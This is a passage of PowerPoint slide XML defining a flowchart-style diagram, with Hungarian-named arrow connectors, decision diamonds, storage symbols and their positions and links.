            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4551248" y="2134390"/>
              <a:ext cx="386339" cy="34696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5" name="Egyenes összekötő nyíllal 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94BB652A-7CE0-4C46-A2B8-C40ADA6B453B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="7" idx="2"/>
              <a:endCxn id="18" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4264487" y="2593409"/>
              <a:ext cx="1077121" cy="12599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8" name="Egyenes összekötő nyíllal 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5C3083-FFE1-4DE1-8A7A-B1D29F20755A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="26" idx="2"/>
              <a:endCxn id="18" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5777847" y="2593409"/>
              <a:ext cx="1918925" cy="78988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2" name="Egyenes összekötő nyíllal 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D77C422A-344C-4C66-A98D-C9FD980E0C0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="21" idx="1"/>
              <a:endCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5883827" y="2010010"/>
              <a:ext cx="514194" cy="4585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6" name="Egyenes összekötő nyíllal 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87172FB-4149-4A5E-87BF-794A0E500590}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="10" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4727820" y="2134390"/>
              <a:ext cx="209767" cy="75951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53" name="Egyenes összekötő nyíllal 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C80FBA-C5D7-4E4B-8A9F-FDE4B30D9BCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10" idx="2"/>
              <a:endCxn id="16" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4214842" y="3253604"/>
              <a:ext cx="512978" cy="62453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58" name="Egyenes összekötő nyíllal 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65FEDEC2-7ECF-404B-9F8E-D3B045C2BCC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10" idx="1"/>
              <a:endCxn id="16" idx="7"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4384323" y="3073752"/>
              <a:ext cx="14698" cy="87410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62" name="Egyenes összekötő nyíllal 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59273AE8-28A0-4DEE-89AB-CF44FB802ED4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="20" idx="2"/>
              <a:endCxn id="26" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7452121" y="2780527"/>
              <a:ext cx="513089" cy="38464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65" name="Egyenes összekötő nyíllal 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C0F1BD-160D-4971-8B36-C0824D9C37DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="20" idx="3"/>
              <a:endCxn id="25" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7225884" y="2475212"/>
              <a:ext cx="543737" cy="215494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74" name="Egyenes összekötő nyíllal 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBEED09-A0E6-487B-8664-F267218D16B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="23" idx="2"/>
              <a:endCxn id="24" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5944004" y="4958532"/>
              <a:ext cx="615322" cy="12842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77" name="Egyenes összekötő nyíllal 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE918ACF-6B5F-42E8-B215-D76DBB40DEEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="22" idx="2"/>
              <a:endCxn id="24" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5006426" y="4930267"/>
              <a:ext cx="782337" cy="26631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80" name="Egyenes összekötő nyíllal 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079709F8-51A3-41E2-B7CD-B8DBA853EC8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="26" idx="3"/>
              <a:endCxn id="25" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7543384" y="3601409"/>
              <a:ext cx="421826" cy="131196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23" name="Folyamatábra: Mágneslemez 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F529532-3DD2-4AE1-88AB-2EAF5AF53E3B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6701837" y="3346226"/>
              <a:ext cx="536875" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="138" name="Egyenes összekötő nyíllal 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A0FCA27-EF79-4348-8EC6-D90AAE457A3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="120" idx="1"/>
              <a:endCxn id="92" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3401511" y="3052291"/>
              <a:ext cx="29054" cy="82584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39" name="Egyenes összekötő nyíllal 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9723E19-0BDF-413A-8BA4-B621CAD82030}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="89" idx="2"/>
              <a:endCxn id="127" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2476623" y="3898574"/>
              <a:ext cx="1085125" cy="59922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40" name="Egyenes összekötő nyíllal 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35153602-7CBA-4BFE-B22A-CF1793CFD132}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="122" idx="2"/>
              <a:endCxn id="92" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3064222" y="2296805"/>
              <a:ext cx="135977" cy="55417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41" name="Egyenes összekötő nyíllal 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BEF1ABC-E663-47FC-A09D-9FD4CC98059E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="92" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2136707" y="2774971"/>
              <a:ext cx="528204" cy="27732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42" name="Egyenes összekötő nyíllal 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73CDE231-F127-4964-99B7-BA1EF6267EB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="133" idx="0"/>
              <a:endCxn id="129" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="9480215" y="2355712"/>
              <a:ext cx="1507307" cy="63419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43" name="Egyenes összekötő nyíllal 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFBBC292-0769-407A-BAED-CF4E90E0407E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="90" idx="2"/>
              <a:endCxn id="89" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1976091" y="2774971"/>
              <a:ext cx="114193" cy="90548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44" name="Egyenes összekötő nyíllal 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06AA3AF4-C4A7-4533-8023-1E44E78CC80F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="90" idx="2"/>
              <a:endCxn id="91" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1694158" y="2774971"/>
              <a:ext cx="281933" cy="62824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45" name="Egyenes összekötő nyíllal 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E5E9D17-980B-4B78-82EE-723877FA03AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="88" idx="2"/>
              <a:endCxn id="91" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1204477" y="2718139"/>
              <a:ext cx="249999" cy="44703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65" name="Egyenes összekötő nyíllal 164">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4AC0B2-18D1-4D3F-8510-5E959D785226}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="134" idx="5"/>
              <a:endCxn id="137" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9245675" y="4066390"/>
              <a:ext cx="691446" cy="19099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70" name="Egyenes összekötő nyíllal 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C8E6FE-D577-4C1B-B7CD-907525967FE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="128" idx="1"/>
              <a:endCxn id="24" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5131282" y="5434624"/>
              <a:ext cx="812722" cy="27794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71" name="Egyenes összekötő nyíllal 170">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055ED10C-0B98-45E1-9F70-EEEE8062997D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="126" idx="2"/>
              <a:endCxn id="132" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8592900" y="5098350"/>
              <a:ext cx="1107054" cy="36562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72" name="Egyenes összekötő nyíllal 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7275ABE9-15BB-4CDA-8302-161486B6F28D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="135" idx="2"/>
              <a:endCxn id="134" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8734051" y="2857241"/>
              <a:ext cx="342143" cy="80277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73" name="Egyenes összekötő nyíllal 172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE6581CD-B60F-47A6-9510-7BE6DF344366}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="136" idx="3"/>
              <a:endCxn id="133" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10260116" y="3396279"/>
              <a:ext cx="557925" cy="6605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74" name="Egyenes összekötő nyíllal 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9E33E1-C403-4A61-A010-309A0638E611}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="135" idx="1"/>
              <a:endCxn id="20" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7769621" y="2475212"/>
              <a:ext cx="578091" cy="16391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75" name="Egyenes összekötő nyíllal 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F89ADABF-6FC3-49DF-8FBF-B4FA7AEF5DF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="129" idx="2"/>
              <a:endCxn id="136" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9480215" y="2593758"/>
              <a:ext cx="393562" cy="65045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76" name="Egyenes összekötő nyíllal 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FDAEA32-B420-4A81-92D3-034AB8BCD56F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="132" idx="2"/>
              <a:endCxn id="125" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6503813" y="5463979"/>
              <a:ext cx="1609723" cy="46671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98" name="Egyenes összekötő nyíllal 197">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735A8EF3-23C0-4D9B-92E9-89C4E2BFED38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="130" idx="4"/>
              <a:endCxn id="121" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2530930" y="4772919"/>
              <a:ext cx="366399" cy="39825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01" name="Egyenes összekötő nyíllal 200">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351F64A2-F606-47D9-B25F-7482CD7A8E16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="130" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2459291" y="3904634"/>
              <a:ext cx="71639" cy="39219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04" name="Egyenes összekötő nyíllal 203">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEBF76F9-0BCA-4A3E-A4B3-362E543B365C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="26" idx="3"/>
              <a:endCxn id="132" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7965210" y="3601409"/>
              <a:ext cx="388008" cy="162452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07" name="Egyenes összekötő nyíllal 206">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89BF2037-7A9D-4C70-B800-1ED96446B83B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="120" idx="3"/>
              <a:endCxn id="16" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3866804" y="3878140"/>
              <a:ext cx="108356" cy="23804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10" name="Egyenes összekötő nyíllal 209">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C543A3-DA74-40C1-842D-38D816B0E9AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="93" idx="2"/>
              <a:endCxn id="120" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3648685" y="3447538"/>
              <a:ext cx="275261" cy="21248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7" name="Rombusz 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3DD69C-EBC3-4BE4-B7F4-295D0C7258BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3977726" y="2243312"/>
              <a:ext cx="573522" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="diamon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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Folyamatábra: Döntés 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E660CF4-53C7-4C40-B32B-4CAD50886F78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4697905" y="1885631"/>
              <a:ext cx="479364" cy="248759"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecisi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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Téglalap: lekerekített 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70481A62-1DB6-46ED-BFBD-CD9EC8658991}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4399021" y="2893900"/>
              <a:ext cx="657597" cy="35970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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Téglalap 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3E799A-CCA9-4EC1-9B70-B64275BE8CBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5534575" y="1828797"/>
              <a:ext cx="349252" cy="36242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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Folyamatábra: Összegzés 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A61DC9E-45FC-4BB9-A041-A5789AF7AAB3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3975160" y="3878139"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Nyíl: négyágú 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A568C752-2064-4668-A6FA-FFEAD8298DB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5341608" y="2375289"/>
              <a:ext cx="436239" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="quad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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Folyamatábra: Belső tárolás 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77243F4B-BE63-40A7-9814-45F9C881C3AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7134621" y="2169896"/>
              <a:ext cx="635000" cy="610631"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartInternalStorag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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Nyíl: jobbra mutató 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FA1024D-BBC7-4CE9-93C0-78390462DF8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6398021" y="2267229"/>
              <a:ext cx="736600" cy="402625"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Folyamatábra: Lyukszalag 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CCFD56C-03BE-44F1-B54D-62C519750DF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4688926" y="4537652"/>
              <a:ext cx="635000" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartPunchedTap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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Folyamatábra: Válogatás 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5E10AE2-8369-46BB-9D27-FAF717821394}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
